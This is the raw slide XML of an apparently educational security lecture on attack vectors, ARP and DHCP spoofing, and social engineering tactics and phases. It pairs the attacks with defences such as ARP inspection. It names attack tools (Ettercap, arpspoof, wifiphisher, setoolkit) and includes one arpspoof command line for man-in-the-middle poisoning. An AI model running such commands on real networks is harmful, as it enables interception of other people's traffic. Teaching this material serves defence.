                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Defence? Switch untrusted ports can have DHCP server type messages on NO, just like a firewall. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">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بردارهای حمله ها</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="Google Shape;127;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4088600" y="576900"/>
            <a:ext cx="4537500" cy="38607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بردارهای حمله</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Advanced Persistent Threat (APT)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Botnet</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>cloud computing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>insider attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>mobile attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Viruses</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Worms</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>malware</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="1" algn="r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="160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7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ARP Poisoning or Spoofing</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60" name="Google Shape;460;p76"/>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200"/>
              <a:t>Address Resolution Protocol</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Request will broadcast its MAC+IP toward 00MAC+IP. Everyone will check and if its their IP, they will respond with their MAC+IP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Gratuitous ARP is like tipping or proxy arp. Just a packets saying “this is my MAC + IP”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>First we need to understand the ARP</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Attacker will send gratuitous to router with its MAC and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> IP. And another one to the target, telling it its MAC as routers IP. </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Tools like Ettercap, Cain &amp; Abel &amp; arpspoof</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>We can also do a Mac Spoof! Become someone else</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>arpspoof -i eth0 -t target -r default_gw</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="45720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Defence:</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>RP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> inspection. Header to payload ver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ification.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>ill </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>check the IP and MAC with what it learned on Port from DHCP or ARP ACL (static list). This should run on untrusted ports.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a: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77"/>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Social Engineering</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="466" name="Google Shape;466;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4753550" y="2005700"/>
            <a:ext cx="3640800" cy="2482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a:t>Risks because of:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Insufficient training</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Lack of control</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Technical control</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Administrative control (dual signature, forced off days so other people will see the problem, ..)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Physical control</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Large companies have more problems	</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Lack of policies</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="467" name="Google Shape;467;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="792550" y="2081550"/>
            <a:ext cx="3640800" cy="2482800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Tricking people to give us what we want!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Email, Link, Phone (Vishing), …</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>One the most dangerous risks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Why it works?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>We want to trust others</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Ignorance</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Fear; something bad is going to happen if you don’t listen to me</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Greed</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Moral obligation (helping)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Social Proof (peer pressure)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Authority</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Liking someone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p78"/>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 Phases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73" name="Google Shape;473;p78"/>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Open Sans"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Research on target (Dumpster, website, employees, tour the company, ...)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Choose the victim </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Build relationship </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(physical relation or digital)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Exploit relationship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should have:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Incident handling (report to whom if happened)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt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Terms::</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Impersonation </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Shoulder surfing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Tailgating / piggybacking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Biometrics (Finger, Iris, Retina, Face, Voice)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Baiting (Free stuff!) </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914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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Google Shape;478;p79"/>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 Attacks</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79" name="Google Shape;479;p79"/>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Char char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Physical</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Phishing</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Smishing</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Vishing</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Cloning sites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Rouge sites (Just like trojans)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Wifi vector</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Free account</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w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ifiphisher</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etoolkit</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
